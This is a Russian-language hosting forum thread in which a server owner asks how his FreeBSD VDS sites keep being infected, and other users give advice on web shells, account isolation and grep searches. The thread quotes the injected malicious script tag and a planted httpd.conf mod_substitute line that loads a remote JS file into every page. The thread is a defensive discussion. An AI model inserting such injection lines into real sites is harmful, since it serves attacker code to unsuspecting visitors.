Какой способ взлома сервера?

S
На сайте с 17.03.2009
Offline
66
2660

Добрый день!

На VDS под FreeBSD-8 есть несколько десятков сайтов с различными CMS. Примерно раз в месяц замечаю, что некоторые файлы в сайтах изменяются. Признаки одинаковые: меняются .php файлы, перед закрывающим тегом /<head> прописывается код типа

<script language="JavaScript" src="http://3xindianse***m/st/css/js/jq-footer.js" type="text/javascript"></script>

Код во всех измененных файлах одинаковый. Меняются файлы в разных СMS - замечал в WordPress, HostCMS, WikiMedia, DLE (с заплаткой). Пароли менял, не помогло. Может, кто встречал такую инфу?

Техподдержка хостинга клянется, что скорее всего взламывают через дырку в Joomla. Один из сайтов действительно на этой CMS, но я не понимаю, действительно ли этот пииии :madd: может через один сайт менять и другие?

Как думаете, права техподдержка, или это у них уязвимость есть?

Mik Foxi
На сайте с 02.03.2011
Offline
1178
#1

смотрите логи. уязвимость может быть в любом из движков, а может у вас с компа вирусами просто украли фтп пароли.

Антибот, антиспам, веб фаервол, защита от накрутки поведенческих: https://antibot.cloud/ (Зеркало: https://антибот.рф/ ) Форум на замену серчу: https://foxi.biz/
LEOnidUKG
На сайте с 25.11.2006
Offline
1762
#2
может через один сайт менять и другие?

Да. На 1 заливается шелл и у хакера доступ полный как у вас на фтп.

✅ Мой Телеграм канал по SEO, оптимизации сайтов и серверов: https://t.me/leonidukgLIVE ✅ Качественное и рабочее размещение SEO статей СНГ и Бурж: https://getmanylinks.ru/ ✅ Настройка и оптимизация серверов https://getmanyspeed.ru/
TF-Studio
На сайте с 17.08.2010
Offline
334
#3

Если сайты не изолированы друг от друга - то стоит это сделать.

Через 1 - можно все разнести в сопли

Всё ещё лучший способ заработка для белых сайтов: GoGetLinks (https://www.gogetlinks.net/?inv=fahbn8).
servercraft
На сайте с 03.07.2013
Offline
8
#4
Staspost:

Техподдержка хостинга клянется, что скорее всего взламывают через дырку в Joomla. Один из сайтов действительно на этой CMS, но я не понимаю, действительно ли этот пииии 😡 может через один сайт менять и другие?
Как думаете, права техподдержка, или это у них уязвимость есть?

как запускается php (вряд ли apache mpm-itk)? разнесены ли сайты по отдельным аккаунтам?

скорее всего саппорт прав, вломили джумлу, имеют доступ к файлам пользователя apache, через вебшелл. тк вломить впс ноду немного сложнее чем просто необновлявшуюся джумлу...

http://serverсraft.com.ua (http://servercraft.com.ua) настраиваем сервера, удаляем вирусы с сайтов
S
На сайте с 17.03.2009
Offline
66
#5

ОК, всем спасибо. Сайты не были разнесены по отдельным аккаунтам, исправляю данное упущение.

servercraft
На сайте с 03.07.2013
Offline
8
#6
Staspost:
Сайты не были разнесены по отдельным аккаунтам, исправляю данное упущение.

🙅 главное чтобы еще пхп запускался с правами пользователя, на аккаунте которого расположен файл, а не апача.

mod-itk, mpm-peruser, suрhp и тд

LineHost
На сайте с 20.01.2007
Offline
339
#7

Банально, но это в большинстве случаев поможет найти шелл:

find . -exec grep -l "FilesMan" {} \;   

Все файлы которых найдёт просмотреть и удалить весь или часть с шеллом ;) Проявив смекалку можно найти и другое ;)

SERV.LT - Стабильные услуги хостинга, KVM VPS в Литве, Франции. (https://www.serv.lt/ru/vps/kvm/) Недорогие выделенные серверы (https://www.serv.lt/ru/dedicated-lt/) в Литве.
ME
На сайте с 05.09.2010
Offline
25
#8

Такая же бяка завелась, весь код вроде облазил не нашел. апач ittk.

сижу в раздумьях откуда оно лезти может

Така як ти буває раз на все життя
ME
На сайте с 05.09.2010
Offline
25
#9

Видимо каким то образом руткит произошел, в файлик httpd.conf добавлена строчка

#AddOutputFilterByType SUBSTITUTE text/html

#Substitute 's|</head>|<script language="JavaScript" src="http://3xindiansex.com/st/css/js/jq-footer.js" type="text/javascript"></script></head>|ni'

Glueon
На сайте с 26.07.2013
Offline
172
#10

Пробовали искать eval'ы с base64_decode? Простой grep на JS ссылку точно ничего не даст. Если шелл есть, то наверняка ужат с помощью base64 и сидит где-нибудь очень глубоко.

Есть много IP-сетей в аренду под прокси, парсинг, рассылки (optin), vpn и хостинг. Телега: @contactroot ⚒ ContactRoot команда опытных сисадминов (/ru/forum/861038), свой LIR: сдаем в аренду сети IPv4/v6 (/ru/forum/1012475).

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий